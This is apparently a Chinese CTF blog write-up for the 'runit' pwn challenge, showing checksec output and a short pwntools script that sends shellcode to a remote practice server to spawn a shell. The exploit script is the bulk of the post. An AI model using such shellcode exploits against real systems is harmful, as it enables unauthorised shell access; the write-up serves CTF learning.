Yk2eR0's Blog.

runit

字数统计: 220阅读时长: 1 min
2020/12/04 Share
1
2
3
4
5
6
7
pwndbg> checksec
[*] '/home/yk2/ctf/runit/pwn'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)

虽然NX开了,但给了read,直接ret2shellcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
from pwn import *
from LibcSearcher import *
import subprocess

s = lambda data: sh.send(data)
sa = lambda delim, data: sh.sendafter(delim, data)
sl = lambda data: sh.sendline(data)
sla = lambda delim, data: sh.sendlineafter(delim, data)
sea = lambda delim, data: sh.sendafter(delim, data)
r = lambda numb=4096: sh.recv(numb)
ru = lambda delims, drop=True: sh.recvuntil(delims, drop)
info_addr = lambda tag, addr: sh.info(tag + ': {:#x}'.format(addr))
itr = lambda: sh.interactive()
debug = lambda command='': gdb.attach(sh, command)
context(arch='i386', os='linux',log_level="debug")


def one_gadget(filename):
return map(int, subprocess.check_output(['one_gadget', '--raw', filename]).split(' '))


# one_gadget('/lib/x86_64-linux-gnu/libc.so.6')
# libc=LibcSearcher('puts',puts
sh = remote('node3.buuoj.cn',25490)#process('/home/yk2/ctf/runit/pwn')
ru('!!')
sl(asm(shellcraft.sh()))

itr()

原文作者:Yk2eR0

原文链接:https://www.yk2er0.fun/2020/12/04/runit/

发表日期:十二月 4日 2020, 4:12:28 下午

更新日期:April 5th 2021, 9:26:26 am

版权声明:非商业用允许转载

CATALOG